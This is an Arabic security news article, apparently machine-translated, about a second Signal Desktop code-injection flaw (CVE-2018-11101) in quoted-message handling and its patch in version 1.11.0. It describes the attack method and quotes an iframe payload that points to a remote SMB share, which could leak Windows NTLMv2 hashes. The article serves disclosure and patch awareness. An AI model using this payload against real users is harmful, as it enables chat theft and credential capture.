للمرة الثانية في أقل من أسبوع ، يتعين على مستخدمي تطبيق المراسلة المشفرة من طرف إلى طرف الشهير تحديث تطبيقات سطح المكتب مرة أخرى لتفادي ثغرة أمنية خطيرة أخرى.
تم اكتشافه يوم الاثنين من قبل نفس فريق الباحثين الأمنيين ، حيث تشكل الثغرات الأمنية المكتشفة حديثًا نفس التهديد الذي سببه التهديد السابق ، مما يسمح للمهاجمين عن بعد بإدخال شيفرة خبيثة على تطبيق سطح المكتب الخاص بالمستلمين بمجرد إرسالهم رسالة - دون الحاجة إلى أي تدخل من المستخدم.
لفهم المزيد عن الثغرة الأمنية الأولى في إدخال الشفرة (CVE-2018-10994) ، يمكنك قراءة مقالتنا السابقة التي تغطي كيفية اكتشاف الباحثين لعيب الإشارة وكيف يعمل.
والفرق الوحيد بين الاثنين هو أن العيب السابق يتواجد في الوظيفة التي تعالج الروابط المشتركة في الدردشة ، في حين أن الثغرة الجديدة (CVE-2018-11101) موجودة في وظيفة مختلفة تعالج التحقق من صحة الرسائل المقتبسة ، أي الاقتباس رسالة سابقة في الرد.
بعبارة أخرى ، لاستغلال الأخطاء التي تم تصحيحها مؤخرًا في الإصدارات الضعيفة من تطبيق سطح المكتب الإشاري ، يجب على جميع المهاجمين فعله هو إرسال رمز HTML / javascript ضار كرسالة إلى الضحية ، ثم اقتباس / الرد على نفس الرسالة مع أي نص عشوائي.
إذا استلمت الضحية هذه الرسالة المقتبسة التي تحتوي على الحمولة الضارة على تطبيق سطح المكتب الإشعاعي المعرض للخطر ، فستقوم تلقائيًا بتنفيذ الحمولة ، دون الحاجة إلى أي تدخل من المستخدم.
استغلال حقن رمز الإشارة لسرقة الدردشات
حتى الآن ، كانت الحمولات النافعة للحملة المستخدمة لإثبات نقاط ضعف إدخال الشفرات في Signal تقتصر على تضمين علامة HTML iFrame ، أو علامات الصور / الفيديو / الصوت على تطبيق سطح المكتب الضحية.
ومع ذلك ، تمكن الباحثون الآن من صياغة استغلال جديد لـ PoC والذي قد يسمح للمهاجمين عن بعد بسرقة جميع محادثات الإشارة الخاصة بالضحايا في النص العادي بمجرد إرسالهم رسالة.
يهزم هذا الإختراق حرفياً الغرض من تطبيق المراسلة المشفرة من النهاية إلى النهاية ، مما يسمح للمهاجمين عن بعد بسهولة الحصول على المحادثات على النص العادي للمستخدمين دون كسر التشفير.
قد يكون المهاجمون سرقة كلمة سر Windows كذلك
ما هو أسوأ؟
في منشور مدونتهم ، أشار الباحثون أيضًا إلى أن المهاجم قد يتضمن ملفات من مشاركة SMB عن بعد باستخدام HTML iFrame ، والذي يمكن إساءة استخدامه لسرقة كلمة مرور NTLMv2 لمستخدمي Windows.
"في نظام التشغيل Windows ، فشل CSP في منع تضمين الموارد عن بُعد عبر بروتوكول SMB. وفي هذه الحالة ، يمكن تحقيق تنفيذ جافا سكريبت عن بُعد من خلال الرجوع إلى البرنامج النصي في مشاركة SMB كمصدر لعلامة iframe ، على سبيل المثال يقول < الباحثون > : <iframe src = \\ DESKTOP-XXXXX \ Temp \ test.html> ثم يردون عليه.
على الرغم من أنهم لم يدعوا أي شيء عن هذا النوع من الهجوم ، إلا أنني أتوقع أنه إذا كان باستطاعة أحد المهاجمين استغلال حقنة الشفرة لإجبار نظام التشغيل Windows على بدء مصادقة تلقائية مع خادم SMB الذي يسيطر عليه المهاجم باستخدام تسجيل الدخول الأحادي ، فسيتم تسليمه في النهاية اسم المستخدم الضحية ، و NTLMv2 تجزئتها كلمة المرور للمهاجمين ، مما يسمح لهم على الأرجح الوصول إلى نظام الضحية.
لقد رأينا كيف تم استغلال تقنية الهجوم نفسها مؤخرًا باستخدام ثغرة أمنية في Microsoft Outlook ، تم الكشف عنها في الشهر الماضي.
لا يمكنني التحقق من هذا الادعاء في هذه اللحظة ، لكننا على اتصال مع بعض الباحثين الأمنيين لتأكيد ذلك.
أفاد الباحثون - إيفان أرييل باريرا أورو وألفريدو أورتيغا وجوليانو ريزو ومات برايانت - بشكل مسؤول عن مدى الضعف أمام شركة Signal ، وقام مطوروها بتصحيح الثغرة مع إصدار سطح المكتب Signal 1.11.0 لمستخدمي Windows و MacOS و Linux.
ومع ذلك ، علمت The Hacker News أن مطوري الإشارة قد حددوا هذه المشكلة بالفعل كجزء من إصلاح شامل لأول نقطة ضعف قبل أن يعثر عليها الباحثون ويبلغون عنها.
يحتوي تطبيق الإشارة على آلية التحديث التلقائي ، لذلك يجب على معظم المستخدمين تثبيت التحديث بالفعل. يمكنك قراءة هذا الدليل للتأكد مما إذا كنت تشغل إصدارًا محدثًا من الإشارة.
وإذا لم تقم بذلك ، فيجب عليك تحديث الإشارة الخاصة بك على الفور لسطح المكتب بأسرع ما يمكن ، حيث أن الثغرة تشكل خطرًا شديدًا على عرض المحادثات السرية الخاصة بك في نص عادي للمهاجمين وعواقب وخيمة أخرى.